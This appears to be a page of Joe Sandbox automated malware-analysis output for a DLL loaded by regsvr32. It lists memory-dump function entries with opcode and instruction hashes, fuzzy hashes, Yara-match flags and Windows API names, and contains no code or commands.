                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )K$U|$|1-
                                                                                                                                      • API String ID: 0-2543966960
                                                                                                                                      • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                      • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                                                                                      • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                      • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 6|$6`d$H~z
                                                                                                                                      • API String ID: 0-1702722476
                                                                                                                                      • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                      • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                                                                                      • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                      • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: d~$`5$t>
                                                                                                                                      • API String ID: 0-1282322184
                                                                                                                                      • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                      • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                                                                                      • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                      • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #St$JYr$hmn
                                                                                                                                      • API String ID: 0-1556749129
                                                                                                                                      • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                      • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                                                                                      • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                      • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: TGA$K$W}
                                                                                                                                      • API String ID: 0-588348707
                                                                                                                                      • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                      • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                                                                                      • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                      • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: :1,$@H${C=
                                                                                                                                      • API String ID: 0-2737386091
                                                                                                                                      • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                      • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                                                                                      • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                      • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: prP$q<C$uL
                                                                                                                                      • API String ID: 0-1414207395
                                                                                                                                      • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                      • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                                                                                      • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                      • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: :00D$Kl$(R'
                                                                                                                                      • API String ID: 0-3661897330
                                                                                                                                      • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                      • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                                                                                      • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                      • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _getptd.LIBCMT ref: 00007FFC6720597E
                                                                                                                                        • Part of subcall function 00007FFC67206550: RtlCaptureContext.KERNEL32 ref: 00007FFC6720658F
                                                                                                                                        • Part of subcall function 00007FFC67206550: IsDebuggerPresent.KERNEL32 ref: 00007FFC6720662D
                                                                                                                                        • Part of subcall function 00007FFC67206550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206637
                                                                                                                                        • Part of subcall function 00007FFC67206550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206642
                                                                                                                                        • Part of subcall function 00007FFC67206550: GetCurrentProcess.KERNEL32 ref: 00007FFC67206658
                                                                                                                                        • Part of subcall function 00007FFC67206550: TerminateProcess.KERNEL32 ref: 00007FFC67206666
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                      • String ID: C
                                                                                                                                      • API String ID: 1583075380-1037565863
                                                                                                                                      • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                      • Instruction ID: 8beb57b438eb2c15fb64f3386fc043456f7585ee5c3b746e9d13d71cbffc4f28
                                                                                                                                      • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                      • Instruction Fuzzy Hash: 7051A662B1C66AC1EA649B2394797BB5790FF84B88F448831EE4D47789DE3CE095C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3731964398-0
                                                                                                                                      • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                                      • Instruction ID: 1312c958b194fd8927f4df16d40f76c6e8e96146428ab2d434b36b7ba69fe2e8
                                                                                                                                      • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                                      • Instruction Fuzzy Hash: 1E217172B0C68AC7EB689B26D9593EA7390FF88B49F004635C71D47695DF3CE494C620
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3731964398-0
                                                                                                                                      • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                      • Instruction ID: ef3a7c9e28b68ab044b995e4083eb4154c70bcd0b8eb313c4244a40e6d101054
                                                                                                                                      • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                      • Instruction Fuzzy Hash: 9421B072B1C699C6DB28CB22D4593EA73A0FB88B88F404635DA5D47354CF3CE554C720
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$Y}
                                                                                                                                      • API String ID: 0-941771097
                                                                                                                                      • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                      • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                                                                                      • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                      • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 7;}~$?C
                                                                                                                                      • API String ID: 0-2633536567
                                                                                                                                      • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                      • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                                                                                      • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                      • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5"*$Wu
                                                                                                                                      • API String ID: 0-3407213400
                                                                                                                                      • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                      • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                                                                                      • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                      • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: F/|$]M
                                                                                                                                      • API String ID: 0-4182351379
                                                                                                                                      • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                      • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                                                                                      • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                      • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ;SH$nK
                                                                                                                                      • API String ID: 0-1681473137
                                                                                                                                      • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                      • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                                                                                      • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                      • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,$z
                                                                                                                                      • API String ID: 0-3532108746
                                                                                                                                      • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                      • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                                                                                      • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                      • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: g/?$~l;
                                                                                                                                      • API String ID: 0-1448562259
                                                                                                                                      • Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                                      • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                                                                                      • Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                                      • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JM$S
                                                                                                                                      • API String ID: 0-422059844
                                                                                                                                      • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                      • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                                                                                      • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                      • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: \4t$sT>
                                                                                                                                      • API String ID: 0-514966222
                                                                                                                                      • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                      • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                                                                                      • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                      • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 6 zT$lh
                                                                                                                                      • API String ID: 0-3667112246
                                                                                                                                      • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                      • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                                                                                      • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                      • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2Q'$t<p
                                                                                                                                      • API String ID: 0-2959822804
                                                                                                                                      • Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                                      • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                                                                                      • Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                                      • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 95s$\`s
                                                                                                                                      • API String ID: 0-3495284040
                                                                                                                                      • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                      • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                                                                                      • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                      • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 3*$qMu
                                                                                                                                      • API String ID: 0-4093015089
                                                                                                                                      • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                      • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                                                                                      • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                      • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$"n&E
                                                                                                                                      • API String ID: 0-1188898577
                                                                                                                                      • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                                      • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                                                                                      • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
